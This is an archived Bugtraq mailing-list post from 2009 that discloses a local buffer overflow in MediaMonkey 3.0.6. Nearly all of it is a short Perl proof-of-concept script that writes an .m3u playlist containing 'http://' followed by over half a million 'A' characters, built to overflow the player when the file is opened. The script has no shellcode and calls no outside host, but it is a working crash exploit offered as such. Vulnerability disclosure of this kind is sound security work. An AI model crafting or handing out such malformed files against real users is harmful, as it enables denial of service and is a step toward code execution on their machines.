lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <200901251414.n0PEEn7h026659@www5.securityfocus.com> Date: Sun, 25 Jan 2009 07:14:49 -0700 From: alphanix00@...il.com To: bugtraq@...urityfocus.com Subject: MediaMonkey 3.0.6 (.m3u file) Local Buffer Overflow PoC #!/usr/bin/perl # By ALpHaNiX # NullArea.Net # THanks #can get the software from http://www.download.com/MediaMonkey-Standard/3000-2141_4-10109807.html my $file = "alpix.m3u" ; print "[+] Exploiting....." ; my $buff1="http://"."A" x 543339 ; open(m3u, ">>$file") or die "Cannot open $file"; print m3u $buff1; close(m3u); print "\n[+] done !";